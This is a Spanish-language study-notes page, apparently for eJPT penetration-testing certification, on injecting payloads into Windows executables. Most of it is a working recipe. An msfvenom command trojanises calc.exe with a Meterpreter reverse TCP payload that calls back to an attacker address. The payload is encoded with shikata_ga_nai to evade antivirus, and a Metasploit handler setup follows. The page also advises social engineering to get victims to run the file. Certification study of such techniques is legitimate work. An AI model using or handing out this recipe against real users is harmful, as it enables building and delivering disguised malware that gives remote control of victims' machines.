> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/ataques-del-lado-del-cliente/payloads/inyeccion-de-payloads-en-ejecutables-portatiles-en-windows.md).

# Inyección de payloads en ejecutables portátiles en Windows

## 📌 ¿Qué es?

La **inyección de payloads en ejecutables PE (Portable Executable)** es una técnica en la que se toma un binario legítimo de Windows (como una calculadora, instalador o cualquier `.exe` confiable) y se le **inyecta un payload malicioso**, generalmente usando `msfvenom`. El resultado es un archivo aparentemente legítimo, pero que al ejecutarse abre una sesión de reverse shell o meterpreter.

Esto se hace comúnmente para **evadir antivirus** y aumentar la **probabilidad de ejecución** por parte del usuario objetivo.

***

## 🧪 Ejemplo práctico

Supongamos que tienes un ejecutable legítimo, por ejemplo: `calc.exe`, y deseas inyectar un payload que al ejecutarse, abra una sesión reverse hacia tu máquina Kali.

**🛠️ Comando:**

```bash
msfvenom -x calc.exe -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > calc_infectado.exe
```

* `-x calc.exe`: Ejecutable base.
* `-p`: Payload (en este caso, Meterpreter reverse TCP para Windows).
* `LHOST/LPORT`: IP y puerto donde escuchará el atacante.
* `-e`: Encoder para evadir detección (usamos `shikata_ga_nai`).
* `-i 5`: 5 iteraciones de encoding.
* `-f exe`: Formato de salida.
* `-o`: Archivo de salida final.

***

## 📥 Enviar y ejecutar

Una vez generado `calc_infectado.exe`, puedes usar **ingeniería social** para hacer que la víctima lo descargue y ejecute. Por ejemplo, enviar por correo o colocarlo en una carpeta compartida.

***

## 📡 Preparar el handler en Metasploit

```bash
msfconsole
```

```msf
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.6
set LPORT 4444
exploit
```

Cuando la víctima ejecute el archivo `calc_infectado.exe`, se iniciará una sesión Meterpreter en tu consola.
